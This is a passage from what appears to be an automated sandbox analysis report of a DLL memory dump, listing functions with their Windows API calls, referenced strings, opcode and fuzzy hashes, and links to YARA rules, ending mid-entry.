Function 6E9C849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6E9C83B9,00000000,?,6E9C8550,00000000), ref: 6E9C849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6E9C83B9,00000000,?,6E9C8550,00000000), ref: 6E9C84C5
HeapAlloc.KERNEL32(00000000), ref: 6E9C84CC
InitializeSListHead.KERNEL32(00000000), ref: 6E9C84D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E9C84EE
HeapFree.KERNEL32(00000000), ref: 6E9C84F5

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: bd8b0ddd3b97855ec0b4d7f134563897299a84c75489cb86047d1fe0bd8ef0f2
Instruction ID: a3cc3f9bef283ab817ee64c3afa3d15c9882399ff2c3f9d191eb9850f98c4bf3
Opcode Fuzzy Hash: bd8b0ddd3b97855ec0b4d7f134563897299a84c75489cb86047d1fe0bd8ef0f2
Instruction Fuzzy Hash: 0FF06271214B02ABDB65AFB88C18B1636BCBF86B26F00442CEA49D7344FF30D4018A62

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5F10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E9E622F,?,00000000), ref: 6E9E5FA9
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E9E622F,?,00000000), ref: 6E9E5FD2
GetACP.KERNEL32(?,?,6E9E622F,?,00000000), ref: 6E9E5FE7

Strings

OCP, xrefs: 6E9E5F64
ACP, xrefs: 6E9E5F2E

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7e8347f18555fe58a58e7a8991b5186e505becd9370aaffff955b3577e1afa6e
Instruction ID: a208ff7c7c7cdd20b3c58d348a7b2f1182eb436261fd2126318aea5af8ace3d8
Opcode Fuzzy Hash: 7e8347f18555fe58a58e7a8991b5186e505becd9370aaffff955b3577e1afa6e
Instruction Fuzzy Hash: AE21C722614605ABD75A8FD5C904F8773BEAF45B60B528C64EB09CB908F732DD80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E60E4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

Part of subcall function 6E9DA294: _free.LIBCMT ref: 6E9DA2EF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E9E61F0
IsValidCodePage.KERNEL32(00000000), ref: 6E9E624B
IsValidLocale.KERNEL32(?,00000001), ref: 6E9E625A
GetLocaleInfoW.KERNEL32(?,00001001,6E9DB71F,00000040,?,6E9DB83F,00000055,00000000,?,?,00000055,00000000), ref: 6E9E62A2
GetLocaleInfoW.KERNEL32(?,00001002,6E9DB79F,00000040), ref: 6E9E62C1

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: 064907c5e66f4fa004fb2430873625188e78905e6a27a2110ed47d3b0404d596
Instruction ID: 65d9dd84899a08ba8c20942d9229a55990ea968e088b5a238f2037e75c8adc20
Opcode Fuzzy Hash: 064907c5e66f4fa004fb2430873625188e78905e6a27a2110ed47d3b0404d596
Instruction Fuzzy Hash: 6B516B71910616EAEB52DBE9CC50AAE73BCAF55704F004869EB24EB682E770D904CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9DB726,?,?,?,?,6E9DB318,?,00000004), ref: 6E9E588E
_wcschr.LIBVCRUNTIME ref: 6E9E591E
_wcschr.LIBVCRUNTIME ref: 6E9E592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E9DB726,00000000,6E9DB846), ref: 6E9E59CF

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: 374e28a0db3a478c9ac9571b9bf94ac0a03e6db494267295af824c7ef4f4a9ee
Instruction ID: fb22df6f59d05f64550cd52c1eaa21e085d74d8b8706799ea9241279fb8dd813
Opcode Fuzzy Hash: 374e28a0db3a478c9ac9571b9bf94ac0a03e6db494267295af824c7ef4f4a9ee
Instruction Fuzzy Hash: DE612671600606AAEB169FF5CC41BEA73ACEF45714F14482AEB15DB980EB70E944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C5239, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C523E
UnhandledExceptionFilter.KERNEL32(6E9EB3CC,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C5247
GetCurrentProcess.KERNEL32(C0000409,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C5252
TerminateProcess.KERNEL32(00000000,?,6E9C5358,6E9EB3CC,00000017), ref: 6E9C5259

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 32741677a257db07706a83ab6b995ead700a79272c9cfb9c29ca1f0f2655259c
Instruction ID: cd818e52e36c00146d141cc7229c24d6f494f6666648844856aa29ff6393f59f
Opcode Fuzzy Hash: 32741677a257db07706a83ab6b995ead700a79272c9cfb9c29ca1f0f2655259c
Instruction Fuzzy Hash: 63D00272048B08EFDE612BE1D95DB993F38EF4A767F004410F70A86469EB7154518B66

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B9BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E9B9CDA
VariantCopy.OLEAUT32(?,?), ref: 6E9B9CE8
SysFreeString.OLEAUT32(00000000), ref: 6E9B9D30
SysFreeString.OLEAUT32(-00000001), ref: 6E9B9DC2
VariantClear.OLEAUT32(?), ref: 6E9B9DF7
SysFreeString.OLEAUT32(-00000001), ref: 6E9B9E16
SysFreeString.OLEAUT32(00000000), ref: 6E9B9E47
SysFreeString.OLEAUT32(00000000), ref: 6E9B9E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E9B9EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E9B9EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E9B9F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E9B9F28
SysFreeString.OLEAUT32(00000000), ref: 6E9B9F37
SysFreeString.OLEAUT32(00000000), ref: 6E9B9FBB
SysFreeString.OLEAUT32(00000000), ref: 6E9B9FFF
_com_issue_error.COMSUPP ref: 6E9BA041
_com_issue_error.COMSUPP ref: 6E9BA04B
_com_issue_error.COMSUPP ref: 6E9BA051
_com_issue_error.COMSUPP ref: 6E9BA05B
SysFreeString.OLEAUT32(76AFD5B0), ref: 6E9BA061

Strings

offsetY, xrefs: 6E9B9CF6
!, xrefs: 6E9BA00A
lines, xrefs: 6E9B9EDB, 6E9B9F02

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: ad81b93131c92c7adbce254343b9e8cbf6672a95d301c96bd02284c7fbeb2b12
Instruction ID: 95f01aa4cd80468c8651ea88adda8d404e4d91aaabd0b808d1bab0b90c9df9e1
Opcode Fuzzy Hash: ad81b93131c92c7adbce254343b9e8cbf6672a95d301c96bd02284c7fbeb2b12
Instruction Fuzzy Hash: 6AF18AB0A0020ADFEB11DFE5C854BAFBBB8AF56718F104458E915BB280DB75E905CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C23F0, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E9C24A3
GetParent.USER32(?), ref: 6E9C24AC
GetClientRect.USER32 ref: 6E9C24C2
CreateCompatibleDC.GDI32(?), ref: 6E9C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E9C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E9C24F6
SelectObject.GDI32(00000000,?), ref: 6E9C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E9C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E9C252F
SetBkMode.GDI32(?,00000001), ref: 6E9C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E9C2544
GetClientRect.USER32 ref: 6E9C2556
ClientToScreen.USER32(?,?), ref: 6E9C2564
ClientToScreen.USER32(?,?), ref: 6E9C2579
ClientToScreen.USER32(?,?), ref: 6E9C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E9C25FD
SelectObject.GDI32(?,?), ref: 6E9C2608
SelectObject.GDI32(?,?), ref: 6E9C2613
DeleteObject.GDI32(?), ref: 6E9C261D
DeleteDC.GDI32(?), ref: 6E9C2624
EndPaint.USER32(?,?), ref: 6E9C2632

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 81cd590d90f9b390cdb0e68b3dc4ea7a69b6efbfc5c26899f983e4652267d05c
Instruction ID: 4ef6bbd8344bed31d86984b77169c1821d61442492505b3c10c4e99a491b5305
Opcode Fuzzy Hash: 81cd590d90f9b390cdb0e68b3dc4ea7a69b6efbfc5c26899f983e4652267d05c
Instruction Fuzzy Hash: DB613C71108B01AFDB209F64C908B6FBBF9FF99715F00491DF6A5922A4DB30A905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C2460, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E9C24A3
GetParent.USER32(?), ref: 6E9C24AC
GetClientRect.USER32 ref: 6E9C24C2
CreateCompatibleDC.GDI32(?), ref: 6E9C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E9C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E9C24F6
SelectObject.GDI32(00000000,?), ref: 6E9C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E9C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E9C252F
SetBkMode.GDI32(?,00000001), ref: 6E9C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E9C2544
GetClientRect.USER32 ref: 6E9C2556
ClientToScreen.USER32(?,?), ref: 6E9C2564
ClientToScreen.USER32(?,?), ref: 6E9C2579
ClientToScreen.USER32(?,?), ref: 6E9C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E9C25FD
SelectObject.GDI32(?,?), ref: 6E9C2608
SelectObject.GDI32(?,?), ref: 6E9C2613
DeleteObject.GDI32(?), ref: 6E9C261D
DeleteDC.GDI32(?), ref: 6E9C2624
EndPaint.USER32(?,?), ref: 6E9C2632

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 2f39da31a14fe477098bc6cef717964b35a683b164b5ff3829453d3504dbcfba
Instruction ID: 266b1075a98eccc24c0de3b10fe88f41ec7ce3a945e5d26c18c449547e23afcf
Opcode Fuzzy Hash: 2f39da31a14fe477098bc6cef717964b35a683b164b5ff3829453d3504dbcfba
Instruction Fuzzy Hash: 37511671108B41AFDB219F64C908F6EBBF9FF89710F00491DF6A592264EB31A905CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D7B6C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9D7BDC
_free.LIBCMT ref: 6E9D7BF2
_free.LIBCMT ref: 6E9D7C03
_free.LIBCMT ref: 6E9D7C14
_free.LIBCMT ref: 6E9D7C2B
GetCPInfo.KERNEL32(?,?), ref: 6E9D7C73

Part of subcall function 6E9DF178: _free.LIBCMT ref: 6E9DF1E3

_free.LIBCMT ref: 6E9D7E1F
_free.LIBCMT ref: 6E9D7E32
_free.LIBCMT ref: 6E9D7E40
_free.LIBCMT ref: 6E9D7E4B
_free.LIBCMT ref: 6E9D7E8D
_free.LIBCMT ref: 6E9D7E95
_free.LIBCMT ref: 6E9D7E9D
_free.LIBCMT ref: 6E9D7EA5
_free.LIBCMT ref: 6E9D7EB3

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 8d83593ada4d20778b1fcbbd2d63f2d59a0d428ba5b3405eff57a05ad5c14f3e
Instruction ID: f99eedd349aa2aca3fde9c975aab42472cb99f806ca2678751f230df6c8ed616
Opcode Fuzzy Hash: 8d83593ada4d20778b1fcbbd2d63f2d59a0d428ba5b3405eff57a05ad5c14f3e
Instruction Fuzzy Hash: D0B1BE71900B16AFDB108FA9C890BEEBBFCFF58304F148869E458A7291D775D8498F60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BA080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,7BDA3107,76AFD5B0,00000000), ref: 6E9BA124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E9BA132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,7BDA3107,76AFD5B0,00000000), ref: 6E9BA14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E9BA170
SysFreeString.OLEAUT32(00000000), ref: 6E9BA17F
SysFreeString.OLEAUT32(00000000), ref: 6E9BA306
SysFreeString.OLEAUT32(00000000), ref: 6E9BA358
_com_issue_error.COMSUPP ref: 6E9BA366
SysFreeString.OLEAUT32(76AFD5B0), ref: 6E9BA36C

Strings

8, xrefs: 6E9BA22F
line, xrefs: 6E9BA11B, 6E9BA146
Arial, xrefs: 6E9BA195

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: ad7e28dcdee356583fd254768717419e6293f3d176b7c9b307bca602db836b7e
Instruction ID: 350972f00097f69b9f31619cdf3b2d78ed9780b829a161baf9b038396e9af3fa
Opcode Fuzzy Hash: ad7e28dcdee356583fd254768717419e6293f3d176b7c9b307bca602db836b7e
Instruction Fuzzy Hash: 52A1C270A04349DFEB10CFE4C848BAFBBB8AF55714F104558E915AB280DBB5EA44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E9E2CE8

Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E44DB
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E44ED
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E44FF
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4511
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4523
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4535
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4547
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4559
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E456B
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E457D
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E458F
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E45A1
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E45B3

_free.LIBCMT ref: 6E9E2CDD

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9E2CFF
_free.LIBCMT ref: 6E9E2D14
_free.LIBCMT ref: 6E9E2D1F
_free.LIBCMT ref: 6E9E2D41
_free.LIBCMT ref: 6E9E2D54
_free.LIBCMT ref: 6E9E2D62
_free.LIBCMT ref: 6E9E2D6D
_free.LIBCMT ref: 6E9E2DA5
_free.LIBCMT ref: 6E9E2DAC
_free.LIBCMT ref: 6E9E2DC9
_free.LIBCMT ref: 6E9E2DE1

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7b1a17f917d0531d2b6c49028c9d32682995fc3d87396cb48d6934478f9cbca2
Instruction ID: 438b9cc6c8ecf73308eeda55a9e9ae309c9419ba7b1d89188887bfbc8e6a7569
Opcode Fuzzy Hash: 7b1a17f917d0531d2b6c49028c9d32682995fc3d87396cb48d6934478f9cbca2
Instruction Fuzzy Hash: 6E314D32614B06AFEB529EB8D854BEA73ECBF50314F118819E658D7550DF74E8848F20

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E45BC, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9E4604
_free.LIBCMT ref: 6E9E4628
_free.LIBCMT ref: 6E9E4635
_free.LIBCMT ref: 6E9E465A
_free.LIBCMT ref: 6E9E4667
_free.LIBCMT ref: 6E9E4670
_free.LIBCMT ref: 6E9E494E
_free.LIBCMT ref: 6E9E4956

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 088245bf02b639cbd457ee0a441cf1480644eb506e03738f967346e041e25a81
Instruction ID: 12bc7ec463afbc6391919983fc020c3409f9208a9b9436a8c6e11374af6c1fc7
Opcode Fuzzy Hash: 088245bf02b639cbd457ee0a441cf1480644eb506e03738f967346e041e25a81
Instruction Fuzzy Hash: ABC15FB6D40614AFDB20CAE8CC82FDA77FCAF59715F148455EA08EB281E670D9458FA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BF070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6E9BEEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,7BDA3107,00000000,00000000), ref: 6E9BEEEE
Part of subcall function 6E9BEEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 6E9BEF1B
Part of subcall function 6E9BEEB0: CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF34
Part of subcall function 6E9BEEB0: CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF3F
Part of subcall function 6E9BEEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 6E9BEFAE

lstrcmpiW.KERNEL32(?,6E9F8A28,?,7BDA3107,C000008C,00000000,?,?,00000000,6E9E9BA6,000000FF,?,6E9C00F7,00000000,00000000,C000008C), ref: 6E9BF0F3
lstrcmpiW.KERNEL32(?,6E9F8A2C,?,6E9C00F7,00000000,00000000,C000008C,C000008C), ref: 6E9BF10A

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: 7f05328101c5f8b14bf5f3885d4099f1780610762b07cbfbb2ff909cf312b2d1
Instruction ID: 61ec98eb8aef5768a2a89fa77902a7d24d63d55f5a3cf112c24e646679349d31
Opcode Fuzzy Hash: 7f05328101c5f8b14bf5f3885d4099f1780610762b07cbfbb2ff909cf312b2d1
Instruction Fuzzy Hash: 0BD1C279900219DADB25CFA4CC48BEEB3B9AF58318F1104D9EA09A7241D770EE59CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DBE31, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

_memcmp.LIBVCRUNTIME ref: 6E9DC0DB
_free.LIBCMT ref: 6E9DC14C
_free.LIBCMT ref: 6E9DC165
_free.LIBCMT ref: 6E9DC197
_free.LIBCMT ref: 6E9DC1A0
_free.LIBCMT ref: 6E9DC1AC
GetStartupInfoW.KERNEL32(?), ref: 6E9DC209
GetFileType.KERNEL32(?,6E9DB318,?,00000004), ref: 6E9DC272

Strings

C, xrefs: 6E9DBF99

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
String ID: C
API String ID: 1665419104-1037565863
Opcode ID: 35e9ed82c822b186b2cda01f66b0e9512649cf6fd251a76417150ea6461477d0
Instruction ID: 16d2113a924d4be65c4e4c8a174b58cc1cd1bf51feebd6ccc91d27bbcd443c5e
Opcode Fuzzy Hash: 35e9ed82c822b186b2cda01f66b0e9512649cf6fd251a76417150ea6461477d0
Instruction Fuzzy Hash: 47D19175A01A2A9FDB24DFA8C894B9DB7B8FF49304F108599D949A7354E730EE84CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C34B0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E9FFAA4,?,?), ref: 6E9C34FA
GetClassInfoExW.USER32 ref: 6E9C352D
GetClassInfoExW.USER32 ref: 6E9C3544
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C3553
LoadCursorW.USER32(6E9B0000,00007F00), ref: 6E9C35A7
GetClassInfoExW.USER32 ref: 6E9C35FE
RegisterClassExW.USER32 ref: 6E9C3615
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C36C3

Strings

ATL:%p, xrefs: 6E9C35C8

Memory Dump Source

